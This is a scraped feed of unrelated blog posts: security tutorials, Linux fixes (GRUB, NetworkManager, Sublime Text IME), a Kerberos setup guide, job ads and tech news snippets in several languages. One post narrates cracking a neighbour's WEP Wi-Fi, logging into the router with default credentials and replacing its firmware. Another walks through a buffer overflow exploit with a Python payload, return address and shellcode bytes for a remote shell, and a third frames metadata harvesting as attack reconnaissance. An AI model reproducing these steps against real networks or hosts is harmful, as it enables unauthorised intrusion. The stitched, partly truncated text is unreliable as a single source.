Note: The Guake terminal (yellow font) has been configured to show up on both the screens. For this, I edited the '/usr/bin/guake' and changed the width from '100' to '200'.

So far, I am pleased with this multiple screen set up as it offers me a lot more work space, but it will take a little getting used to.

          How to Use Truecrypt | Truecrypt Tutorial [Screenshots] | Kali Linux, BackTrack, BackBox, Windows        
Written by Pranshu Bajpai |  | LinkedIn

Data protection is crucial. The importance of privacy--specially concerning sensitive documents--cannot be overstated, and if you’re here, you have already taken the first step towards securing it.

Truecrypt is one of the best encryption tools out there. It’s free and available for Windows and Linux. It comes pre-installed in Kali Linux and Backtrack. I first came across the tool when I was reading ‘Kingpin’ (The infamous hacker Max Butler was using it to encrypt data that could be used as evidence against him).

Here is how you can set up Truecrypt for use in Kali Linux (similar procedures will work in other Linux distros and Windows).

Goto Applications -> Accessories -> Truecrypt

Truecrypt main window opens up. As this is the first time we are using Truecrypt we need to set up a volume for our use.

Click ‘Create Volume’ and the Truecrypt volume creation wizard opens up:

Click on ‘create an encrypted file container’

This container will contain your encrypted files. The files can be of any type, as long as they lie in this container, they will be encrypted after ‘dismounting the volume’.

Now the next screen asks if you want to create a Standard or Hidden Volume. In case of hidden volume, no one would really know that it is there so they can’t ‘force’ you to provide its password.

For now we will just create a ‘Standard’ volume.

On the next screen you will asked for the ‘location’ of this volume. This can be any drive on your computer. This is where your container will lie. The container can be seen at this location but it won’t have any ‘extension’ and will have the name that you provide it during this set up.

Choose any ‘location’ on your computer for the container and carry on to the next step.

A password is now required for this volume. This is the ‘password’ which will be used to decrypt the volume while ‘mounting’ it. Needless to say, it should be strong as a weak password defeats the whole purpose of security/encryption.

Next click on ‘Format’ and the volume creation would begin. You will be shown a progress bar and it will take some time depending on how big your volume size is.

Once your ‘Formatting’ is completed. Your volume is ready to be used. You can place files in there (drag and drop works). Once done ‘Dismount’ this volume and exit Truecrypt.

When you want to access the encrypted files in the container, fire up Truecrypt and click on any ‘Slots’ on the main window.

Now goto ‘Mount’ and point to the location of the container which you selected during setting up the volume.

It will then prompt you for the password.

If you provide the correct password, you’ll see that the volume is mounted on the ‘Slot’ that you selected, if you double-click that ‘Slot’ a new explorer window would open where you can see your decrypted files and work with them. And you can add more files to the container if you want.

After you’re done, ‘Dismount’ the volume and exit Truecrypt.

          FOCA Metadata Analysis Tool        
Written by Pranshu Bajpai |  | LinkedIn

Foca is an easy-to-use GUI Tool for Windows that automates the process of searching a website to grab documents and extract information. Foca also helps in structuring and storing the Metadata revealed. Here we explore the importance of Foca for Penetration Testers

Figure 1: Foca ‘New Project’ Window

Penetration Testers are well-versed in utilizing every bit of Information for constructing sophisticated attacks in later phases.  This information is collected in the ‘Reconnaissance’ or ‘Information gathering’ phase of the Penetration Test. A variety of tools help Penetration Testers in this phase. One such Tool is Foca.
Documents are commonly found on websites, created by internal users for a variety of purposes. Releasing such Public Documents is a common practice and no one thinks twice before doing so. However, these public documents contain important information like the ‘creator’ of the document, the ‘date’ it was written on, the ‘software’ used for creating the document etc.  To a Black Hat Hacker who is looking for compromising systems, such information may provide crucial information about the internal users and software deployed within the organization.

What is this ‘Metadata’ and Why would we be interested in it?
The one line definition of Metadata would be “A set of data that describes and gives information about other data”. So when a Document is created, its Metadata would be the name of the ‘User’ who created it, ‘Time’ when it was created, ‘Time’ it was last modified, the ‘folder path’ and so on. As Penetration Testers we are interested in metadata because we like to collect all possible information before proceeding with the attack. Abraham Lincoln said “Give me six hours to chop down a tree and I will spend the first four sharpening the axe”. Metadata analysis is part of the Penetration Tester’s act of ‘sharpening the axe’. This Information would reveal the internal users, their emails, their software and much more.

Gathering Metadata
As Shown in Figure 1, Foca organizes various Projects, each relating to a particular domain. So if you’re frequently analyzing Metadata from several domains as a Pen Tester, it can be stored in an orderly fashion. Foca lets you crawl ‘Google’, ‘Bing’ and ‘Exalead’ looking for publicly listed documents (Figure 2).

Figure 2: Foca searching for documents online as well as detecting insecure methods
 You can discover the following type of documents:

Once the documents are listed, you have to explicitly ‘Download All’ (Figure 3).

Figure 3: Downloading Documents to a Local Drive
 Once you have the Documents in your local drive, you can ‘Extract All Metadata’ (Figure 4).

Figure 4: Extracting All Metadata from the downloaded documents
This Metadata will be stored under appropriate tabs in Foca. For Example, ‘Documents’ tab would hold the list of all the documents collected, further classified into ‘Doc’, ‘Docx’, ‘Pdf’ etc. After ‘Extracting Metadata’, you can see ‘numbers’ next to ‘Users’, ‘Folders’, ‘Software’, ‘Emails’ and ‘Passwords’ (Figure 5). These ‘Numbers’ depend on how much Metadata the documents have revealed. If the documents were a part of a database then you would important information about the database like ‘name of the database’, ‘the tables contained in it’, the ‘columns in the tables’ etc.

Figure 5: Foca showing the ‘numbers’ related to Metadata collected

Figure 6: Metadata reveals Software being used internally
Such Information can be employed during attacks. For Example, ‘Users’ can be profiled and corresponding names can be tried as ‘Usernames’ for login panels. Another Example would be that of finding out the exact software version being used internally and then trying to exploit a weakness in that software version, either over the network or by social engineering (Figure 6).
At the same time it employs ‘Fuzzing’ techniques to look for ‘Insecure Methods’ (Figure 2)
Clearly Information that should stay within the organization is leaving the organization without the administrators’ knowledge. This may prove to be a critical security flaw. It’s just a matter of ‘who’ understands the importance of this information and ‘how’ to misuse it.
So Can Foca Tell Us Something About the Network?
Yes and this is one of the best features in Foca. Based on the Metadata in the documents, Foca attempts to map the Network for you. This can be a huge bonus for Pen Testers. Understanding the Network is crucial, especially in Black Box Penetration Tests.

Figure 7: Network Mapping using Foca
As seen in Figure, a lot of Network information may be revealed by Foca. A skilled attacker can leverage this information to his advantage and cause a variety of security problems. For example ‘DNS Snoop’ in Foca can be used to determine what websites the internal users are visiting and at what time.
So is Foca Perfect for Metadata Analysis?
There are other Metadata Analyzers out there like Metagoofil, Cewl and Libextractor. However, Foca seems to stand out. It is mainly because it has a very easy to use interface and the nice way in which it organizes Information. Pen Testers work every day on a variety of command line tools and while they enjoy the smoothness of working in ‘shell’, their appreciation is not lost for a stable GUI tool that automates things for them. Foca does the same.
However, Foca has not been released for ‘Linux’ and works under ‘Windows only’, which may be a drawback for Penetration Testers because many of us prefer working on Linux. The creators of Foca joked about this issue in DEFCON 18“Foca does not support Linux whose symbol is a Penguin. Foca (Seal) eats Penguins”.

Protection Against Such Inadvertent Information Compromise
Clearly, public release of documents on websites is essential. The solution to the problem lies in making sure that such documents do not cough up critical information about systems, softwares and users. Such documents should be internally analyzed before release over the web. Foca can be used to import and analyze local documents as well. It is wise to first locally extract and remove Metadata contained in documents before releasing them over the web using a tool called ’OOMetaExtractor’. Also, a plugin called ‘IIS Metashield Protector’ can be installed in your server which cleans your document of all the Metadata before your server is going to serve it.


Like many security tools, Foca can be used for good or bad. It depends on who extracts the required information first, the administrator or the attacker. Ideally an administrator would not only locally analyze documents before release, but also take a step ahead to implement a Security Policy within the organization to make sure such Metadata content is minimized (or falsified). But it is surprising how the power of information contained in the Metadata has been belittled and ignored. A reason for this maybe that there are more direct threats to security that the administrators would like to focus their attention on, rather than small bits of Information in the Metadata. But it is to be remembered that if Hackers have the patience to go ‘Dumpster Diving’, they will surely go for Metadata Analysis and an administrator’s ignorance is the Hacker’s bliss.

On the Web

●                     http:// www.informatica64.com/– Foca Official Website

          'Device Not Managed' by NetworkManager - Debian / Ubuntu / Kali Linux | Problem [Solved]        
Written by Pranshu Bajpai |  | LinkedIn

Problem Scenario:

When you install a fresh copy of Kali linux / Debian / Ubuntu, you may be plagued by this error which wouldn't let you connect to the 'Wired' network. The Wireless (wlan0) might work just fine but under 'Wired' Network, it says 'Device not managed'


If this interface appears in '/etc/network/interfaces' file, Network Manager won't manage it by default and we need to change this behavior.

To do this, make modifications in the file:
#vi /etc/NetworkManager/NetworkManager.conf
Change 'managed-false' to 'managed=true'

Now restart the Network Manager
#service network-manager restart
You should see 'Auto Ethernet' appear under the 'Wired' header in the Network Manager now and would be able to connect to it.
          How To Recover Grub After Installing Windows | Ubuntu / Kali / Debian Linux        
Written by Pranshu Bajpai |  | LinkedIn

A Little Rant

It's 2014 and Windows still assumes that it's the only OS out there.

When you install windows and then install Linux, in the grub boot menu you would find Windows properly accounted for. Grub recognized windows and creates an entry for it in the Boot Menu.

Should we assume Microsoft likes bullying (since there's no apparent technical reason for why they won't make a windows boot-loader that would recognize and make an entry for Linux in the Boot menu).

So if you have Linux and then you try to install Windows, it's nasty boot-manager would remove the linux entry and all you will see at Boot time is Windows and no entry for linux.

Kali Linux is the primary OS that I use on my laptop. I rarely ever use windows so I removed it altogether. However I was developing an App for Windows and needed to code in Windows SDK (Visual Studio) since I needed some libraries like 'wlanapi' that weren't present in Linux IDEs

Long story short, I installed Windows on top of Kali and as I expected, it removed the entry to Kali from the boot menu.

Here are a few commands that I used to solve this issue. This is by far the easiest way to bring the Linux / Ubuntu / Kali boot entry back.

How To Recover Grub (Kali Linux Boot Menu Entry) After Installing Windows 

For this you need:

1. Ubuntu (or Any linux) Live CD / USB
2. Eyes to read and Fingers to Type some commands 

Step 1. Boot from the Ubuntu / Kali / Fedora (any linux) live disk OR USB

Step 2. After the 'Live CD Desktop' loads up, Find Terminal.

Step 3. After the Terminal comes up. Type the following commands:

#sudo mount /dev/sda10 /mnt 

#Note that here for me the root ( / ) of my Kali Linux was on device '/dev/sda10'. For you this would be different and you should check this out under 'Disk Manager' in your Live CD. You are looking for the partition number of your main partition

#for i in /sys /proc /run /dev; do sudo mount --bind "$i" "/mnt$i"; done

#sudo chroot /mnt


#grub-install /dev/sda


Step 5. That's it. Exit the Terminal and reboot.

You should now see Grub restored. This is one of the ways in which you can easily and quickly restore grub after installing windows

Note that sometimes you may loose the entry to your Windows OS after these steps. But all you need to do is run these 3 commands to get it back:

#apt-get install os-prober






I recently lost Linux grub again after installing Windows 7 on my laptop and this time I decided to try an ISO called 'boot-repair disk'. I had heard of this a lot and seems to be the tool of choice for people who don't want to get their hands dirty using the linux terminal.

The tool is pretty good in that it does what it is meant for, without any glitches. This is all you have to do:

1. Download 'boot-repair disk' ISO
2. Burn it to a CD or make a bootable Pendrive
3. Boot into the boot-repair disk ISO

After that, it is all automated. As soon as you boot into this live disk, it will automatically begin mounting all your file systems and looking for grub. Once it is located, it will be restored automatically and at the end a message will be displayed to you.

So if you are someone who isn't all that thrilled about typing commands on a Linux terminal in the method I discussed previously, this ISO is for you.

          Hacking Neighbour's Wifi (Password) | Hacking Neighbor's Wireless (Internet) | Step by Step How To        
Written by Pranshu Bajpai |  | LinkedIn

Disclaimer: For educational purposes only: This is meant merely to exhibit the dangers of using Poor wireless security. Please note that prior to beginning the test you should seek explicit consent from the owner if the access point does not belong to you.

Hacking into a Neighbor's Wifi access point

OS: Kali Linux
Test Subject: Neighbor's WiFi Access Point
Encryption: WEP

I noticed 4 wireless Access Points in the vicinity. 3 of these were using WPA / WPA2 and I was in no mood for a dictionary attack on WPA handshake, since it takes a long time and success isn't guaranteed. I found one access point using WEP Security and as you know it is an outdated protocol with poor security.

I tested penetrating this WEP access point using the same Aircrack-ng Suite of tools as I have mentioned in this previous post.

Step 1: Discovered the WEP AP having SSID 'dlink'  (Notice the weak signal power from neighbor's house to mine)

Step 2: Collected the required number of Data Packets from the WEP Network. Meanwhile, I used 'aireplay-ng --arpreplay' to increase the data rate since I am not a Patient soul.

Step 3: Saved the data packets in a file called 'neighbor-01.cap' and cracked the password using 'Aircrack-ng'

The Key for the Neighbor's Wifi turned out to be: "1234567890"   -    (An easily guessable Password, just what I expected from someone using WEP Security in 2014)

Step 4: I connected to the wifi using the decrypted key, it allocated an IP to me using DHCP (

Note: If you want a better step by step on how to hack a WiFi, check out my previous post here.

5: I was connected to the Internet.

6: Since I was part of their network now, curiosity got the better of me and I decided to scan the network and see who else is connected. I found 3 devices in the network:

One was my Laptop
Another one was my cellphone (I connected my cellphone to the network earlier)
And third was the Dlink router itself (
None of the neighbor's own devices were connected to the network at the time.

nmap told me that the dlink router had an open port 80, which reminded me to check out the control panel of this dlink device.

Step 7: So I fired up my browser and went to '' which opened the login panel for dlink access point control panel

Step 8:  Quick google search revealed that defaults for login on dlink devices are:
username: 'admin' and password:blank
Step 9: A tried logging in with defaults and got access to the control panel.

(Again BAD security practice: leaving defaults unchanged!)

Step 10: I was getting weak power from the AP and decided to upgrade their firmware and see if it made a difference.

The Current firmware of the neighbor's wifi was '5.10'

I checked for latest Firmware available. It was '5.13'

I downloaded the upgrade on my machine ("DIR********.bin")

Step 11: I made a backup of the configuration of the Access point before upgrading. I saved backup 'config.bin' to my laptop from the neighbor's wifi

Step 12: I went ahead and upgraded the Firmware. I uploaded the DIR****.bin from my laptop to the access point and it went for a reboot.

I lost access to the WiFi after the upgrade.

I figured the new upgraded firmware changed the Password for the WiFi now and I couldn't connect to it anymore. Moreover, since I lost access to the Internet now along with the WiFi, I couldn't Google the default password for the upgraded firmware anymore.

And I couldn't crack it either because this time no one--not even the neighbor himself--would be able to authenticate to the WiFi with the new unknown password after the firmware upgrade and hence no data packets would be generated and I will have nothing to crack.

Step: I fired up 'Airodump-ng' again and noticed that the firmware upgrade simply changed the access point security to "open", ie, no password is required to connect to it.

Step: I connected to the "Open" wifi and restored the Configuration settings using the 'config.bin' backup I made earlier.

I manually selected WPA2 security and provided the same password as used earlier by my neighbor ("1234567890")

Disclaimer: Please note that I had explicit consent from the owner before commencing this test. If you do not have such permission, please try it on your own access point. Failing to do so will result in illicit activities.

          Buffer Overflow Attack Example [Sending Shellcode] | Tutorial | Exploit Research | How To        
Written by Pranshu Bajpai |  | LinkedIn

This is a demonstration of a Buffer Overflow attack to get remote shell of a Windows box.

Vulnerable Program - Server-Memcpy.exe [Resource: SecurityTube]
Vulnerable Function  - memcpy
Tools - msfpayload, Immunity Debugger

Read up on Memory layout and Stack Frames before you begin [see 'Resources' at the bottom of this page]

Buffer Overflow Attack Example and Demonstration

Testing the Vulnerability to discover the possibility of a Buffer Overflow

Get the vulnerable server running on a Windows box and note the IP.

Create an exploit in python on your Linux machine sending input to the remote vulnerable server running on the Windows box.

Send an input of  "A" * 1000 and notice the server crashing on the Windows box after receiving the first 1024 bytes.

Now load the server.exe in the Immunity Debugger and run the executable (F9).

Run the exploit on Linux box again to send an input of "A" * 1000 to crash the server on Windows box.

Notice the state of the registers and stack in the debugger after the server crashes. Notice EBP and EIP overflow and now both contain '41414141' which is hex for "AAAA".

Now we can see that we can overflow the buffer and manipulate the address stored in EIP and EBP.

Caculating the Offset using pattern_create and pattern_offset

To calculate the Offset we need 'pattern_create.rb' and 'pattern_offset.rb' included with the Metasploit Framework Toolkit

Create a Large Pattern (of 1000 bytes) using pattern_create

Copy and Pattern and send this pattern as Input to the Vulnerable server using the Python Exploit

Check the Value of EIP in the debugger [In this case it is 6A413969]

 Search for this value in the pattern by using pattern_offset.rb

Note down the offset value = 268 [So now we understand that these first 268 bytes don't matter to us, they are just used to fill the buffer]

We are interested in the remaining bytes which will include the return address and the payload (shellcode) and optionally NOP sled.

Finding the Return Address

Now we need to find out the return address to be fed to EIP which will point to the Malicious payload (Shellcode) in the stack

We notice that the return address can be 0022FB70

In Little Endian format the return address is \x70\xFB\x22\x00

Creating Payload [ Generating Shellcode for Windows box ]

Now we require the payload (shellcode). It can be generated using msfpayload

About Bad Bytes in the Shellcode or Return Address

(If you're a beginner, this might confuse you. If that's the case, skip this part as it doesn't apply for this particular example.)

Remember to remove any bad bytes if you notice them in the shellcode or return address (bytes like null, carriage return).

We notice that our return address has a byte "\x00" in the end which is a bad byte.

However, in this particular case, since the function is memcpy, the string terminator byte of "\x00" doesn't matter.

But in a function like strcpy this bad byte would terminate the string and we would have to use address of a JUMP ESP as return address.

Constructing Final Exploit Code

In the Python exploit, Send Input = 268 Random bytes (A) + Return Address (\x70\xFB\x22\x00) + Shellcode

Final Exploit Code would send the following input to the Vulnerable Server


_to_send = "A" * 268

_to_send+= "\x70\xFB\x22\x00"

_to_send+= ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"



Exploit Successful, We got a Shell!! 0wn3d!

Send the exploit to vulnerable server (IP:, in this case)

This would spawn a shell on the Windows box which would be listening on port 4444

Use netcat to connect to the machine on port 4444

At server side on Windows box, the server is still running and shows that it has received 613 bytes

Do the Math

Random bytes of "A" =           268   bytes
Return Address         =               4   bytes
Payload                    =            341   bytes

Total                       =              613  bytes


Smashing The Stack for Fun and Profit - AlephOne  [It's very important to read this]

Exploit Research @ SecurityTube

Exploit Writing Tutorials at Corelan.be

          Linux Systems Administrator - McKesson - Atlanta, GA        
In-depth knowledge of VMware ESX would be preferred as well as an operational understanding of Dell PowerEdge servers....
From McKesson - Thu, 01 Jun 2017 00:56:45 GMT - View all Atlanta, GA jobs
          RaspyFi – Linux dla audiofila        
RaspyFi to nowa dystrybucja Linuksa, która zaprojektowano z myslą o przekształceniu RaspberryPi w miniaturowy sprzęt audiofilski. Współpracuje z wieloma przetwornikami analogowo-cyfrowymi; ich pełną listę można znaleźć na stronie projektu. Idea jest prosta: podłączamy swoje RaspberryPi do wzmacniacza, siadamy w fotelu z pilotem (którym może być dowolne urządzenie z Andriodem lub iOS-em) i cieszymy się odtwarzaną […]
          About Valve, Steam and Linux: Linux on a Steam Console?        

A few minutes ago, I’ve been reading an article about Valve releasing the new Big Picture Mode for Steam (beta).

As you probably know, Valve’s porting Steam and the Source engine to Linux and there have been many assumptions about why Valve is doing this. Is it because of Windows 8 and its marketplace? Or is it just about expanding to other platforms?

Now there have been many rumors about Valve working on a Steam console.

“But how are those related to each other?” you may think.

In my opinion, there’s a pretty good chance that Valve will use Linux on their console, because:

  • They won’t need to develop everything from scratch.
  • They won’t need to pay Microsoft for Windows licenses (there have been some rumors about that Valve could also use Windows on their console, because of the amount of games that run on it).
  • They could get the Linux community on their side (well that depends on how open the Steam console would be, but getting more games on Linux itself is also a nice thing).

I also think that this could get more developers for Linux games, because it won’t be just about “developing Linux games”, but also about “developing games for Valve’s console”.

I highly appreciate discussion about this topic. If I’m wrong at some point, please tell me.

          L’application de messagerie sécurisée Signal devient très populaire après les élections américaines        

Catégories : Android, iOS, Linux, Logiciel, Mac OS, Sécurité, Téléphonie mobile, Windows

Depuis les révélations de Snowden en 2013 sur l’étendue des systèmes d’écoute sur Internet mis en place par la NSA, le grand public n’a dans l’ensemble que peu changé ses habitudes. « Je n’ai rien à me reprocher, pourquoi est-ce que l’on m’espionnerait ? » est une réplique sortant souvent de la bouche des personnes sceptiques. Une […]

(Continuer à lire...)

          ubuntu mate 下的sublime text 3调用中文输入法的修改        

本经验目前在已有搜狗输入法 for Linux和Sublime Text 3的情况下安装成功。


#include <gtk/gtkimcontext.h>

void gtk_im_context_set_client_window (GtkIMContext *context,




 g_return_if_fail (GTK_IS_IM_CONTEXT (context));


if (klass->set_client_window)

->set_client_window (context, window);


if(!GDK_IS_WINDOW (window))


int width = gdk_window_get_width(window);

int height = gdk_window_get_height(window);

if(width != 0 && height !=0)




cd ~

gcc -shared -o libsublime-imfix.so sublime_imfix.c  `pkg-config --libs --cflags gtk+-2.0` -fPIC


sudo apt-get install build-essential
sudo apt-get install libgtk2.0-dev


sudo mv libsublime-imfix.so /opt/sublime_text/

sudo vim /usr/share/applications/sublime_text.desktop

[Desktop Entry]
=Sublime Text
=Text Editor
=Sophisticated text editor for code, markup and prose
=/usr/bin/subl %F        #这里修改执行路径为/usr/bin/subl,subl文件刚才已经修改过,大家应该记得

[Desktop Action Window]
=New Window
=/usr/bin/subl -n       #这里修改执行路径为/usr/bin/subl,subl文件刚才已经修改过,大家应该记得

[Desktop Action Document]
=New File
=/usr/bin/subl new_file    #这里修改执行路径为/usr/bin/subl,subl文件刚才已经修改过,大家应该记得

如果在命令行中执行/usr/bin/subl打开sublime text后,就应该可以使用中文输入法了。
打开“控制中心”-》打开“主菜单”-》“应用程序”树k目录中找到“编程”,找到“sublime text”,双击修改里边的命令为
/usr/bin/subl %F

SIMONE 2016-08-19 17:53 发表评论

          maven 依赖打包插件        




<!-- 生成linux, Windows两种平台的执行脚本 -->
<!-- 根目录 -->
<!-- 打包的jar,以及maven依赖的jar放到这个目录里面 -->
<!-- 可执行脚本的目录 -->
<!-- 配置文件的目标目录 -->
<!-- 拷贝配置文件到上面的目录中 -->
<!-- 从哪里拷贝配置文件 (默认src/main/config) -->
<!-- lib目录中jar的存放规则,默认是${groupId}/${artifactId}的目录格式,flat表示直接把jar放到lib目录 -->
<!-- 启动类 -->


<move todir="${project.build.directory}/${project.artifactId}-${version}/com/duxiu/demo/app">
<fileset dir="${project.build.directory}/classes/com/duxiu/demo/app">
<include name="*.class" />


SIMONE 2016-07-20 09:42 发表评论

          ubuntu kerberos配置        



Kerberos is a network authentication system based on the principal of a trusted third party. The other two parties being the user and the service the user wishes to authenticate to. Not all services and applications can use Kerberos, but for those that can, it brings the network environment one step closer to being Single Sign On (SSO).

This section covers installation and configuration of a Kerberos server, and some example client configurations.


If you are new to Kerberos there are a few terms that are good to understand before setting up a Kerberos server. Most of the terms will relate to things you may be familiar with in other environments:

  • Principal: any users, computers, and services provided by servers need to be defined as Kerberos Principals.

  • Instances: are used for service principals and special administrative principals.

  • Realms: the unique realm of control provided by the Kerberos installation. Usually the DNS domain converted to uppercase (EXAMPLE.COM).

  • Key Distribution Center: (KDC) consist of three parts, a database of all principals, the authentication server, and the ticket granting server. For each realm there must be at least one KDC.

  • Ticket Granting Ticket: issued by the Authentication Server (AS), the Ticket Granting Ticket (TGT) is encrypted in the user's password which is known only to the user and the KDC.

  • Ticket Granting Server: (TGS) issues service tickets to clients upon request.

  • Tickets: confirm the identity of the two principals. One principal being a user and the other a service requested by the user. Tickets establish an encryption key used for secure communication during the authenticated session.

  • Keytab Files: are files extracted from the KDC principal database and contain the encryption key for a service or host.

To put the pieces together, a Realm has at least one KDC, preferably two for redundancy, which contains a database of Principals. When a user principal logs into a workstation, configured for Kerberos authentication, the KDC issues a Ticket Granting Ticket (TGT). If the user supplied credentials match, the user is authenticated and can then request tickets for Kerberized services from the Ticket Granting Server (TGS). The service tickets allow the user to authenticate to the service without entering another username and password.

Kerberos Server


Before installing the Kerberos server a properly configured DNS server is needed for your domain. Since the Kerberos Realm by convention matches the domain name, this section uses the example.com domain configured in the section called “Primary Master”.

Also, Kerberos is a time sensitive protocol. So if the local system time between a client machine and the server differs by more than five minutes (by default), the workstation will not be able to authenticate. To correct the problem all hosts should have their time synchronized using the Network Time Protocol (NTP). For details on setting up NTP see the section called “Time Synchronisation with NTP”.

The first step in installing a Kerberos Realm is to install the krb5-kdc and krb5-admin-server packages. From a terminal enter:

sudo apt-get install krb5-kdc krb5-admin-server 

You will be asked at the end of the install to supply a name for the Kerberos and Admin servers, which may or may not be the same server, for the realm.

Next, create the new realm with the kdb5_newrealm utility:

sudo krb5_newrealm 


The questions asked during installation are used to configure the /etc/krb5.conf file. If you need to adjust the Key Distribution Center (KDC) settings simply edit the file and restart the krb5-kdc daemon.

  1. Now that the KDC running an admin user is needed. It is recommended to use a different username from your everyday username. Using the kadmin.local utility in a terminal prompt enter:

    sudo kadmin.local Authenticating as principal root/admin@EXAMPLE.COM with password. kadmin.local: addprinc steve/admin WARNING: no policy specified for steve/admin@EXAMPLE.COM; defaulting to no policy Enter password for principal "steve/admin@EXAMPLE.COM":  Re-enter password for principal "steve/admin@EXAMPLE.COM":  Principal "steve/admin@EXAMPLE.COM" created. kadmin.local: quit 

    In the above example steve is the Principal, /admin is an Instance, and @EXAMPLE.COM signifies the realm. The "every day" Principal would be steve@EXAMPLE.COM, and should have only normal user rights.


    Replace EXAMPLE.COM and steve with your Realm and admin username.

  2. Next, the new admin user needs to have the appropriate Access Control List (ACL) permissions. The permissions are configured in the /etc/krb5kdc/kadm5.acl file:

    steve/admin@EXAMPLE.COM        * 

    This entry grants steve/admin the ability to perform any operation on all principals in the realm.

  3. Now restart the krb5-admin-server for the new ACL to take affect:

    sudo /etc/init.d/krb5-admin-server restart 
  4. The new user principal can be tested using the kinit utility:

    kinit steve/admin steve/admin@EXAMPLE.COM's Password: 

    After entering the password, use the klist utility to view information about the Ticket Granting Ticket (TGT):

    klist Credentials cache: FILE:/tmp/krb5cc_1000         Principal: steve/admin@EXAMPLE.COM    Issued           Expires          Principal Jul 13 17:53:34  Jul 14 03:53:34  krbtgt/EXAMPLE.COM@EXAMPLE.COM 

    You may need to add an entry into the /etc/hosts for the KDC. For example:   kdc01.example.com       kdc01 

    Replacing with the IP address of your KDC.

  5. In order for clients to determine the KDC for the Realm some DNS SRV records are needed. Add the following to /etc/named/db.example.com:

    _kerberos._udp.EXAMPLE.COM.     IN SRV 1  0 88  kdc01.example.com. _kerberos._tcp.EXAMPLE.COM.     IN SRV 1  0 88  kdc01.example.com. _kerberos._udp.EXAMPLE.COM.     IN SRV 10 0 88  kdc02.example.com.  _kerberos._tcp.EXAMPLE.COM.     IN SRV 10 0 88  kdc02.example.com.  _kerberos-adm._tcp.EXAMPLE.COM. IN SRV 1  0 749 kdc01.example.com. _kpasswd._udp.EXAMPLE.COM.      IN SRV 1  0 464 kdc01.example.com. 

    Replace EXAMPLE.COM, kdc01, and kdc02 with your domain name, primary KDC, and secondary KDC.

    See Chapter 7, Domain Name Service (DNS) for detailed instructions on setting up DNS.

Your new Kerberos Realm is now ready to authenticate clients.

Secondary KDC

Once you have one Key Distribution Center (KDC) on your network, it is good practice to have a Secondary KDC in case the primary becomes unavailable.

  1. First, install the packages, and when asked for the Kerberos and Admin server names enter the name of the Primary KDC:

    sudo apt-get install krb5-kdc krb5-admin-server 
  2. Once you have the packages installed, create the Secondary KDC's host principal. From a terminal prompt, enter:

    kadmin -q "addprinc -randkey host/kdc02.example.com" 

    After, issuing any kadmin commands you will be prompted for your username/admin@EXAMPLE.COM principal password.

  3. Extract the keytab file:

    kadmin -q "ktadd -k keytab.kdc02 host/kdc02.example.com" 
  4. There should now be a keytab.kdc02 in the current directory, move the file to /etc/krb5.keytab:

    sudo mv keytab.kdc02 /etc/krb5.keytab 

    If the path to the keytab.kdc02 file is different adjust accordingly.

    Also, you can list the principals in a Keytab file, which can be useful when troubleshooting, using the klist utility:

    sudo klist -k /etc/krb5.keytab 
  5. Next, there needs to be a kpropd.acl file on each KDC that lists all KDCs for the Realm. For example, on both primary and secondary KDC, create /etc/krb5kdc/kpropd.acl:

    host/kdc01.example.com@EXAMPLE.COM host/kdc02.example.com@EXAMPLE.COM 
  6. Create an empty database on the Secondary KDC:

    sudo kdb5_util -s create 
  7. Now start the kpropd daemon, which listens for connections from the kprop utility. kprop is used to transfer dump files:

    sudo kpropd -S 
  8. From a terminal on the Primary KDC, create a dump file of the principal database:

    sudo kdb5_util dump /var/lib/krb5kdc/dump 
  9. Extract the Primary KDC's keytab file and copy it to /etc/krb5.keytab:

    kadmin -q "ktadd -k keytab.kdc01 host/kdc01.example.com" sudo mv keytab.kdc01 /etc/kr5b.keytab 

    Make sure there is a host for kdc01.example.com before extracting the Keytab.

  10. Using the kprop utility push the database to the Secondary KDC:

    sudo kprop -r EXAMPLE.COM -f /var/lib/krb5kdc/dump kdc02.example.com 

    There should be a SUCCEEDED message if the propagation worked. If there is an error message check /var/log/syslog on the secondary KDC for more information.

    You may also want to create a cron job to periodically update the database on the Secondary KDC. For example, the following will push the database every hour:

    # m h  dom mon dow   command 0 * * * * /usr/sbin/kdb5_util dump /var/lib/krb5kdc/dump && /usr/sbin/kprop -r EXAMPLE.COM -f /var/lib/krb5kdc/dump kdc02.example.com 
  11. Back on the Secondary KDC, create a stash file to hold the Kerberos master key:

    sudo kdb5_util stash 
  12. Finally, start the krb5-kdc daemon on the Secondary KDC:

    sudo /etc/init.d/krb5-kdc start 

The Secondary KDC should now be able to issue tickets for the Realm. You can test this by stopping the krb5-kdc daemon on the Primary KDC, then use kinit to request a ticket. If all goes well you should receive a ticket from the Secondary KDC.

Kerberos Linux Client

This section covers configuring a Linux system as a Kerberos client. This will allow access to any kerberized services once a user has successfully logged into the system.


In order to authenticate to a Kerberos Realm, the krb5-user and libpam-krb5 packages are needed, along with a few others that are not strictly necessary but make life easier. To install the packages enter the following in a terminal prompt:

sudo apt-get install krb5-user libpam-krb5 libpam-ccreds auth-client-config 

The auth-client-config package allows simple configuration of PAM for authentication from multiple sources, and the libpam-ccreds will cache authentication credentials allowing you to login in case the Key Distribution Center (KDC) is unavailable. This package is also useful for laptops that may authenticate using Kerberos while on the corporate network, but will need to be accessed off the network as well.


To configure the client in a terminal enter:

sudo dpkg-reconfigure krb5-config 

You will then be prompted to enter the name of the Kerberos Realm. Also, if you don't have DNS configured with Kerberos SRV records, the menu will prompt you for the hostname of the Key Distribution Center (KDC) and Realm Administration server.

The dpkg-reconfigure adds entries to the /etc/krb5.conf file for your Realm. You should have entries similar to the following:

[libdefaults]         default_realm = EXAMPLE.COM ... [realms]         EXAMPLE.COM = }                                 kdc =                                admin_server =         } 

You can test the configuration by requesting a ticket using the kinit utility. For example:

kinit steve@EXAMPLE.COM Password for steve@EXAMPLE.COM: 

When a ticket has been granted, the details can be viewed using klist:

klist Ticket cache: FILE:/tmp/krb5cc_1000 Default principal: steve@EXAMPLE.COM  Valid starting     Expires            Service principal 07/24/08 05:18:56  07/24/08 15:18:56  krbtgt/EXAMPLE.COM@EXAMPLE.COM         renew until 07/25/08 05:18:57   Kerberos 4 ticket cache: /tmp/tkt1000 klist: You have no tickets cached 

Next, use the auth-client-config to configure the libpam-krb5 module to request a ticket during login:

sudo auth-client-config -a -p kerberos_example 

You will should now receive a ticket upon successful login authentication.


SIMONE 2016-07-05 11:37 发表评论

          Benchmarking Apache Kafka: 2 Million Writes Per Second (On Three Cheap Machines)        

wrote a blog post about how LinkedIn uses Apache Kafka as a central publish-subscribe log for integrating data between applications, stream processing, and Hadoop data ingestion.

